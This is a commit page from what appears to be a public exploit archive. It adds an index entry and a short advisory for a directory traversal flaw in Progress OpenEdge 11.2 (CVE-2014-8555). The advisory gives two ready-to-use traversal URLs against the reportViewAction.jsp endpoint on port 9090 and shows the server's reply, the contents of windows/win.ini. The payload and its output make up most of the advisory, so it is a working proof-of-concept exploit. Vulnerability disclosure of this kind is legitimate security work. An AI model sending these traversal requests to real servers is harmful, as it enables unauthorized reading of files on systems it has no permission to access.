Updated 11_09_2014
This commit is contained in:
parent
af904ead9b
commit
173a7ded66
2 changed files with 72 additions and 0 deletions
|
@ -31644,6 +31644,7 @@ id,file,description,date,author,platform,type,port
|
|||
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090
|
||||
35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0
|
||||
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
|
||||
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
71
platforms/jsp/webapps/35127.txt
Executable file
71
platforms/jsp/webapps/35127.txt
Executable file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: Progress OpenEdge Directory Traversal
|
||||
# Date: 30/10/2014
|
||||
# Exploit Author: Mauricio Correa
|
||||
# Vendor Homepage: www.progress.com
|
||||
# Software Link: www.progress.com/products/openedge
|
||||
# Version: 11.2
|
||||
# Tested on: Windows OS
|
||||
# CVE : CVE-2014-8555
|
||||
|
||||
|
||||
|
||||
The malicious user sends a malformed request that generates the file access
|
||||
up directories as follows:
|
||||
|
||||
|
||||
|
||||
http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
|
||||
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
|
||||
|
||||
|
||||
|
||||
or else
|
||||
|
||||
|
||||
|
||||
http://
|
||||
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
|
||||
/../../windows/win.ini
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
And the application answers
|
||||
|
||||
|
||||
|
||||
; for 16-bit app support
|
||||
|
||||
[fonts]
|
||||
|
||||
[extensions]
|
||||
|
||||
[mci extensions]
|
||||
|
||||
[files]
|
||||
|
||||
[Mail]
|
||||
|
||||
MAPI=1
|
||||
|
||||
CMCDLLNAME32=mapi32.dll
|
||||
|
||||
CMC=1
|
||||
|
||||
MAPIX=1
|
||||
|
||||
MAPIXVER=1.0.0.1
|
||||
|
||||
OLEMessaging=1
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
|
||||
|
||||
|
||||
|
||||
Thanks
|
||||
|
Loading…
Add table
Reference in a new issue